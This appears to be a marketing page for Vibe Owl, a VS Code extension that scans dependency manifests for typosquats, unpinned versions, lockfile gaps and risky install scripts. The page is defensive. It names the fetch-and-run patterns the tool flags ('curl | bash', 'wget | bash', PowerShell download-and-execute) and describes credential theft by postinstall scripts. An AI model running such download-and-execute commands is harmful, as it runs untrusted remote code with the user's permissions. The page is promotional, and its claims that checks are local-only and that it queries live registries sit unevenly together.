Home/Dependency Security VS Code

Dependency Security in VS Code: How to Audit Package Risks Locally

Why Does Dependency Security Matter for Developers?

Dependency security matters because modern applications rely on hundreds of third-party packages, each representing a potential attack vector. Supply chain attacks through typosquatted packages, malicious install scripts, and compromised maintainer accounts have increased significantly, making local dependency auditing essential for every project.

A typical Node.js application installs 200–800 packages through transitive dependencies. Each package can execute arbitrary code during installation through lifecycle scripts. A single compromised package in the dependency tree can steal credentials, exfiltrate source code, or install backdoors on the developer's machine.

AI coding tools amplify dependency risk. Cursor and Copilot suggest npm install commands for packages the developer has never evaluated. The vibe coding workflow prioritizes speed, which means dependency suggestions are accepted without the security review that would catch a typosquatted name or an unnecessary install script.

What Dependency Ecosystems Does Vibe Owl Support?

Vibe Owl audits dependency manifests across six ecosystems: npm (package.json, package-lock.json), Python (requirements.txt, pyproject.toml), Go (go.mod), Rust (Cargo.toml), Java (pom.xml, build.gradle, build.gradle.kts), and Swift (Package.swift).

Each manifest file is parsed and checked against six risk categories: non-registry sources, typosquatted names, unpinned versions, dangerous install scripts, lockfile issues, and missing integrity hashes. The checks run locally without connecting to any external package registry API.

The Vibe Owl: Run Dependency Risk Guard command scans all manifest files in the workspace and produces a consolidated report with findings grouped by category and severity. Maximum 120 findings per scan.

How Does Typosquat Detection Work?

Vibe Owl detects typosquatted packages by calculating Levenshtein distance between declared package names and known popular packages. Package names within edit distance 1 of popular packages are flagged as potential typosquats at medium severity, catching common attack vectors like loadsh instead of lodash.

Typosquatting attacks register package names that differ from popular packages by one character: a transposition, insertion, deletion, or substitution. Developers who mistype a package name during npm install inadvertently install the attacker's package, which may contain data exfiltration code in its install script.

Vibe Owl applies Levenshtein distance calculation against a maintained list of popular packages. A package named axois (instead of axios) or reqeusts (instead of requests) triggers a medium-severity finding with the correct package name suggested.

What Version Pinning Issues Does Vibe Owl Detect?

Vibe Owl detects unpinned versions using * or latest, wildcard versions with x placeholders, broad range specifiers like >= and ||, and caret ranges on zero-major versions (^0.x) where minor updates can contain breaking or malicious changes.

Wildcard versions (*) allow any version to be installed, including versions published by attackers who compromise a package. latest tags resolve dynamically and can change without notice. Caret ranges on ^0.x packages are particularly dangerous because semantic versioning treats 0.x releases as unstable, and minor version bumps can contain breaking changes.

Lockfile analysis supplements version checks. Vibe Owl detects missing lockfiles when manifests exist, multiple lockfiles in the same directory (indicating build tool confusion), outdated npm v1 lockfile format, and missing integrity hashes. Missing hashes above 35% of packages trigger medium severity; above 70% triggers high severity.

How Does Install Script Detection Protect Against Supply Chain Attacks?

Vibe Owl scans package manifests for lifecycle scripts containing dangerous patterns: curl | bash, wget | bash, and PowerShell download-and-execute patterns. These script patterns execute arbitrary remote code during package installation, representing the primary vector for npm and pip supply chain attacks.

Package install scripts run with the developer's full system permissions. A malicious postinstall script in package.json can read SSH keys, steal environment variables, and install persistent backdoors. Vibe Owl flags these patterns at high severity regardless of the package's popularity.

Pro-tier dependency intelligence extends these checks with signals for dependency surface concentration (90+ packages triggers medium, 180+ triggers high), prerelease version usage, install-script exposure ratios, deprecated package counts, and major-zero version concentration. NPM supply chain attack prevention covers the full scope of these signals and how they combine to detect sophisticated package-based attacks.

AI coding assistants introduce an additional risk that traditional scanning misses. When Cursor or ChatGPT suggests a package name that does not exist on any registry, attackers can claim that name and publish a malicious payload under it. AI dependency hallucination detection in Vibe Owl verifies every npm and PyPI package against live registries, flagging non-existent packages as Critical and newly published packages as High before any install command runs.

How Does Dependency Scanning Integrate with the Preflight Check?

Dependency scanning feeds into the preflight check as one of five independent modules. High or critical dependency findings cause the preflight to fail. Medium findings cause a warning. The preflight consolidates dependency risk alongside code safety, diff risk, git history, and env hygiene into a single PASS/FAIL gate.

The preflight check provides a single command that covers the entire security surface. A developer preparing to push code receives a consolidated result that includes dependency risk status alongside code findings and git safety. The VS Code security extension treats dependency risk as equally important to secret detection because supply chain attacks can compromise an entire project through a single package.

The workspace health score deducts points for dependency findings: 18 points per critical finding, 10 per high, 4 per medium, and 1 per low. Dependency risk directly affects the project's overall security rating and trend tracking.

Marcel Iseli

Marcel Iseli

Founder of Vibe Owl · Software Developer

LinkedIn ↗

Marcel Iseli is a software developer and the creator of Vibe Owl. He built the extension after exposing his own API keys during an early vibe coding session and decided the tooling gap was worth fixing.

Ship safer code today

Vibe Owl scans secrets, flags risky patterns, and runs preflight checks — all locally inside your editor.

Install Vibe OwlInstall via Open VSX